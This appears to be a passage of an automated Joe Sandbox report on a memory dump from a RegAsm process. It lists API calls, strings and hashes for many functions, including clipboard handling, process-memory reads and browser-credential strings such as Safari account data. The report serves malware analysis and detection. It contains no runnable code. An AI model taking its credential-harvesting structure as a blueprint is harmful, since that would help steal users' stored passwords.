                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                • String ID:
                                                                • API String ID: 3655998216-0
                                                                • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 00445426
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                • String ID:
                                                                • API String ID: 1828521557-0
                                                                • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _wcsicmp
                                                                • String ID:
                                                                • API String ID: 2081463915-0
                                                                • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                                • String ID:
                                                                • API String ID: 2136311172-0
                                                                • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??2@??3@
                                                                • String ID:
                                                                • API String ID: 1936579350-0
                                                                • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                Function 00415304 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

                                                                Non-executed Functions

                                                                Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EmptyClipboard.USER32 ref: 004098EC
                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                • GetLastError.KERNEL32 ref: 0040995D
                                                                • CloseHandle.KERNEL32(?), ref: 00409969
                                                                • GetLastError.KERNEL32 ref: 00409974
                                                                • CloseClipboard.USER32 ref: 0040997D
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                • String ID:
                                                                • API String ID: 3604893535-0
                                                                • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EmptyClipboard.USER32 ref: 00409882
                                                                • wcslen.MSVCRT ref: 0040988F
                                                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                • CloseClipboard.USER32 ref: 004098D7
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                • String ID:
                                                                • API String ID: 1213725291-0
                                                                • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32 ref: 004182D7
                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                                • free.MSVCRT ref: 00418370
                                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                • String ID: OsError 0x%x (%u)
                                                                • API String ID: 2360000266-2664311388
                                                                • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Version
                                                                • String ID:
                                                                • API String ID: 1889659487-0
                                                                • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                                • _wcsicmp.MSVCRT ref: 00402305
                                                                • _wcsicmp.MSVCRT ref: 00402333
                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                • memset.MSVCRT ref: 0040265F
                                                                • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                • API String ID: 577499730-1134094380
                                                                • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                • String ID: :stringdata$ftp://$http://$https://
                                                                • API String ID: 2787044678-1921111777
                                                                • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                • GetDC.USER32 ref: 004140E3
                                                                • wcslen.MSVCRT ref: 00414123
                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                                • _snwprintf.MSVCRT ref: 00414244
                                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                • String ID: %s:$EDIT$STATIC
                                                                • API String ID: 2080319088-3046471546
                                                                • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EndDialog.USER32(?,?), ref: 00413221
                                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                • memset.MSVCRT ref: 00413292
                                                                • memset.MSVCRT ref: 004132B4
                                                                • memset.MSVCRT ref: 004132CD
                                                                • memset.MSVCRT ref: 004132E1
                                                                • memset.MSVCRT ref: 004132FB
                                                                • memset.MSVCRT ref: 00413310
                                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                • memset.MSVCRT ref: 004133C0
                                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                • wcscpy.MSVCRT ref: 0041341F
                                                                • _snwprintf.MSVCRT ref: 0041348E
                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                                Strings
                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                • {Unknown}, xrefs: 004132A6
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                • API String ID: 4111938811-1819279800
                                                                • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                • EndDialog.USER32(?,?), ref: 0040135E
                                                                • DeleteObject.GDI32(?), ref: 0040136A
                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                • ShowWindow.USER32(00000000), ref: 00401398
                                                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                • ShowWindow.USER32(00000000), ref: 004013A7
                                                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                • String ID:
                                                                • API String ID: 829165378-0
                                                                • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 00404172
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • wcscpy.MSVCRT ref: 004041D6
                                                                • wcscpy.MSVCRT ref: 004041E7
                                                                • memset.MSVCRT ref: 00404200
                                                                • memset.MSVCRT ref: 00404215
                                                                • _snwprintf.MSVCRT ref: 0040422F
                                                                • wcscpy.MSVCRT ref: 00404242
                                                                • memset.MSVCRT ref: 0040426E
                                                                • memset.MSVCRT ref: 004042CD
                                                                • memset.MSVCRT ref: 004042E2
                                                                • _snwprintf.MSVCRT ref: 004042FE
                                                                • wcscpy.MSVCRT ref: 00404311
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
